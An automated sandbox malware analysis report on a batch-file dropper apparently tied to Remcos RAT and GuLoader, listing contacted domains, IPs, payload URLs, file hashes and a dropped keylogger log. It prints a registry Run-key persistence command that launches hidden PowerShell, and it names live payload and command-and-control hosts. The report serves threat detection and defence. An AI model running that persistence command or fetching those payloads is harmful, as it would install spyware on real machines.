                rIMGTR657365756.bat5%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://www.imvu.comr0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                pelele.duckdns.org
                		185.236.203.101
                		truetrue
                  		unknown
                  plieltd.top
                  		104.21.56.189
                  		truefalse
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      miottoezanella.com
                      		194.76.118.27
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        pelele.duckdns.orgtrue
                          		unknown
                          https://miottoezanella.com/Hovedvrket.rarfalse
                            		unknown
                            http://geoplugin.net/json.gpfalse
                            • URL Reputation: safe
                            		unknown
                            https://plieltd.top/nwnNBPSeuTV8.binfalse
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=PbhvC236.tmp.14.drfalse
                                		unknown
                                https://www.office.com/bhvC236.tmp.14.drfalse
                                  		unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.imvu.comrmsiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://geoplugin.net/json.gplmsiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://go.micropowershell.exe, 00000002.00000002.2196657506.000001DCB101A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://plieltd.top/lmsiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://miottoezanella.compowershell.exe, 00000002.00000002.2196657506.000001DCB101A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196657506.000001DCAFD1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://aka.ms/pscore6lBeqpowershell.exe, 00000005.00000002.2345858403.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhvC236.tmp.14.drfalse
                                              		unknown
                                              http://geoplugin.net/json.gp.msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://miottoezanella.com/Hovedvrket.rarXRpowershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.imvu.commsiexec.exe, msiexec.exe, 00000012.00000002.2554661567.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554228868.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554251966.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554209398.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://plieltd.top/nwnNBPSeuTV8.binafsksGodmiottoezanella.com/nwnNBPSeuTV8.binmsiexec.exe, 00000008.00000002.4524470117.0000000022230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.nirsoft.netmsiexec.exe, 0000000E.00000002.2577200402.0000000002A33000.00000004.00000010.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://aefd.nelreports.net/api/report?cat=bingaotakbhvC236.tmp.14.drfalse
                                                        		unknown
                                                        https://deff.nelreports.net/api/report?cat=msnbhvC236.tmp.14.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://plieltd.top/msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.google.commsiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		unknown
                                                                https://miottoezanella.com/Hovedvrket.rarPpowershell.exe, 00000002.00000002.2196657506.000001DCAFD1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhvC236.tmp.14.drfalse
                                                                    		unknown
                                                                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhvC236.tmp.14.drfalse
                                                                      		unknown
                                                                      http://miottoezanella.compowershell.exe, 00000002.00000002.2196657506.000001DCB1891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://aefd.nelreports.net/api/report?cat=bingaotbhvC236.tmp.14.drfalse
                                                                          		unknown
                                                                          https://maps.windows.com/windows-app-web-linkbhvC236.tmp.14.drfalse
                                                                            		unknown
                                                                            https://contoso.com/powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://miottoezanella.com/powershell.exe, 00000002.00000002.2241503546.000001DCC7CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://aefd.nelreports.net/api/report?cat=bingrmsbhvC236.tmp.14.drfalse
                                                                                		unknown
                                                                                https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                  		unknown
                                                                                  https://login.yahoo.com/config/loginmsiexec.exefalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2196657506.000001DCAFAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.nirsoft.net/msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.imvu.comatamsiexec.exe, 00000012.00000002.2554661567.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554228868.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554251966.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554209398.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2196657506.000001DCAFAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2345858403.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.56.189
                                                                                      		plieltd.topUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      185.236.203.101
                                                                                      		pelele.duckdns.orgRomania
                                                                                      		9009M247GBtrue
                                                                                      178.237.33.50
                                                                                      		geoplugin.netNetherlands
                                                                                      		8455ATOM86-ASATOM86NLfalse
                                                                                      194.76.118.27
                                                                                      		miottoezanella.comItaly
                                                                                      		202675KELIWEBITfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1536035
                                                                                      Start date and time:2024-10-17 15:02:09 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 8s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:19
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:rIMGTR657365756.bat
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winBAT@24/13@7/4
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 96%
                                                                                      • Number of executed functions: 166
                                                                                      • Number of non-executed functions: 294
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .bat
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5576 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: rIMGTR657365756.bat

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      09:03:04API Interceptor80x Sleep call for process: powershell.exe modified
                                                                                      09:04:10API Interceptor5217885x Sleep call for process: msiexec.exe modified
                                                                                      15:03:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Aversi %Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)
                                                                                      15:03:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Aversi %Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      185.236.203.10117282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                                                          DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                178.237.33.50Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                New Order.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                194.76.118.27rSKGCROCOMANDAFABSRLM60_647746748846748347474.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    geoplugin.netPriority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    New Order.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    miottoezanella.comrComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 194.76.118.27

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    KELIWEBITrSKGCROCOMANDAFABSRLM60_647746748846748347474.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 194.76.118.27
                                                                                                    rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 194.76.118.27
                                                                                                    https://shared.outlook.inky.com/link?domain=ctrk.klclick.com&t=h.eJw9jbFuwjAURX8FeYbYie0EMSE1FImhAwvqhOznR2v5EZD9MqH-O5ih87n3nIeYM4nNQvwy38tGSuCcmkRAEVIDt6skqdqDOX7sD6MelT5-rnfWnrqvfjd-n5VYLkSq_5_osyN2eeXnEicsZQXuHtmRzDfMjLT9n3h4m603QzD6Mliv8ILrvveofQCAQVkTlGyHTreqU8Y22tYS1tLVMW_RcchxSgEdlWqrOLzwNBP9PQFiYELz.MEYCIQD02rB_k_ktgQerK63B9HoYsBFlvy8F_tbykpnP7o7g5AIhAOA712rppvWoWatyTJ3OTcEdq2l5y_Vb1I5ameNhve0o%C3%B8#am9obi5kYXZpc0BhbWF6b24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 185.56.218.16
                                                                                                    https://www.bonolacenter.com/Get hashmaliciousPhisherBrowse
                                                                                                    • 185.221.173.68
                                                                                                    Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 185.221.174.5
                                                                                                    Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 185.221.174.2
                                                                                                    64CU11Bnfr.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 185.221.174.2
                                                                                                    https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fwww.animagricola.farm%2Fssl%2Fanimagricola%2FTafeqld%2FbWl0Y2hlbGwuY2FyZXdAdGFmZXFsZC5lZHUuYXU=Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 185.221.175.32
                                                                                                    https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fwww.animagricola.farm%2Fssl%2Fanimagricola%2FTafeqld%2FbmlrLmJhYm92aWNAdGFmZXFsZC5lZHUuYXU=Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 185.221.175.32
                                                                                                    Assicurazioni Generali Bank Payment Copy_doc.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 185.56.218.14
                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                    • 104.21.53.8
                                                                                                    https://dropepweg.pages.dev/?e=nhurn@catsimulators.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 172.66.44.117
                                                                                                    taskhostws.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    wethinkaboutthegreatsolutionforgreat.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    ACCOUNTXSTATEMENT.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    https://iplogger.ru/250925Get hashmaliciousUnknownBrowse
                                                                                                    • 162.159.140.237
                                                                                                    https://iplogger.ru/250925Get hashmaliciousUnknownBrowse
                                                                                                    • 172.66.0.235
                                                                                                    Media24.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.181.177
                                                                                                    M247GBarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 154.17.76.63
                                                                                                    armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 38.206.71.34
                                                                                                    bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                    • 91.202.233.141
                                                                                                    file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                    • 91.202.233.141
                                                                                                    dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                    • 91.202.233.141
                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 45.86.28.95
                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 158.46.140.178
                                                                                                    rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 104.250.180.178
                                                                                                    rWWTLCLtoUSADCL.scr.exeGet hashmaliciousXWormBrowse
                                                                                                    • 104.250.180.178
                                                                                                    rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 185.236.203.100
                                                                                                    ATOM86-ASATOM86NLPriority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    New Order.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ev2.0.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 194.76.118.27
                                                                                                    PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 194.76.118.27
                                                                                                    SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 194.76.118.27
                                                                                                    PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 194.76.118.27
                                                                                                    https://iplogger.ru/250925Get hashmaliciousUnknownBrowse
                                                                                                    • 194.76.118.27
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.2892.1397.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 194.76.118.27
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.5562.5412.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 194.76.118.27
                                                                                                    Bestireno Transformados SL PEDIDO 268884.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 194.76.118.27
                                                                                                    Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 194.76.118.27
                                                                                                    Bestireno Transformados SL PEDIDO 268884.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 194.76.118.27
                                                                                                    37f463bf4616ecd445d4a1937da06e19SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 104.21.56.189
                                                                                                    ecforyoutomakemegood.htaGet hashmaliciousCobalt Strike, AgentTesla, GuLoaderBrowse
                                                                                                    • 104.21.56.189
                                                                                                    Bestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.56.189
                                                                                                    Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.56.189
                                                                                                    Bestireno Transformados SL PEDIDO 268884.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 104.21.56.189
                                                                                                    Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 104.21.56.189
                                                                                                    SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.56.189
                                                                                                    company T.P. Drinovci d.docxGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.56.189
                                                                                                    SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.56.189
                                                                                                    6rxVO117yJ.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                    • 104.21.56.189

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\remcos\logs.dat

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):216
                                                                                                    Entropy (8bit):3.376082901980628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:rhlKlM+UlSl/TlFi5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:6lyIl/T65YcIeeDAlOWAAe5q1gWAv
                                                                                                    MD5:C3A8DBD5C901CB3693A1DFAFBF0250B0
                                                                                                    SHA1:C571E14F360188725CB2C86347E8970E21DB096E
                                                                                                    SHA-256:097093CCA9190CE6F4BF84D87C8719B51C16D703C2048458E3CB4F3D8AC3127F
                                                                                                    SHA-512:CF40D6BA33314A40C209A52FD0D839B3D8F7228A041ADD9B5FD2A00FCA65E6D98E01F9D80ECEC87B3F3532AE07387FA97B56DEF6B5F5499446C53AA4473BC8A6
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                    Preview:....[.2.0.2.4./.1.0./.1.7. .0.9.:.0.3.:.3.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):957
                                                                                                    Entropy (8bit):5.0066301715842645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:qXdVauKyGX85jHf3SvXhNlT3/7YvfbYro:6ba0GX85mvhjTkvfEro
                                                                                                    MD5:09BC68DFB56F7449631EBD54736170C5
                                                                                                    SHA1:AD2F67F875D52D157C3D987831B90685B680B50A
                                                                                                    SHA-256:D71FB637AF6D693D88BA66E02D42E49DD95648BCAC92AE7AD927C221EC77FF84
                                                                                                    SHA-512:AA22D93DFF72395C2E30816A0508403CEC2B94D1E9A82CF702D0437134B053178CA40EC7AAF6275E5FF672277A86E98ADF6BA8B5A2250E0E9664DB04AA7B4B80
                                                                                                    Malicious:false
